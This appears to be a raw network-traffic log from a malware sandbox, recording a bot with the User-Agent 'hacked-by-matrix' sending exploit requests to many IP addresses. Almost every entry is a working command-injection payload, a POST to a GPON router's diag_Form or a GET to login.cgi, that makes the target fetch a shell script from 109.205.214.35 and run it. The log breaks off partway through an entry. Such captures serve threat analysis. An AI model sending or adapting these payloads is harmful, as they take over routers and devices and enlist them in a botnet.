                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        578192.168.2.1347402109.46.49.122443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.587982893 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        579192.168.2.134953442.192.98.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.588042021 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        580192.168.2.135332842.173.89.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.588052988 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        581192.168.2.1339646212.4.227.22780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:39.068885088 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:39.985579014 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:40.162159920 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:40 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        582192.168.2.1342240103.101.179.20180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:39.189532995 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        583192.168.2.1358722109.111.78.88443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598314047 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        584192.168.2.1333932109.117.149.122443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598324060 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        585192.168.2.1357574118.183.116.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598351955 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        586192.168.2.1352226212.196.110.230443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598359108 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        587192.168.2.1355814109.255.44.176443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598371029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        588192.168.2.1355158212.207.156.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598385096 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        589192.168.2.1351248212.180.116.3443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598416090 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        590192.168.2.13491125.132.242.212443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598418951 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        591192.168.2.1352796212.185.100.41443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598447084 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        592192.168.2.133707242.249.197.235443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598450899 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        593192.168.2.1357926118.23.70.201443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598469973 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        594192.168.2.133606442.17.147.146443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598476887 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        595192.168.2.1332768212.64.118.99443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598483086 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        596192.168.2.1357264118.234.70.40443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598522902 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        597192.168.2.1333384109.119.99.107443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598531961 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        598192.168.2.13440065.212.173.137443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598561049 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        599192.168.2.13589005.255.178.85443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598568916 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        600192.168.2.1341084118.129.236.24443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598603010 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
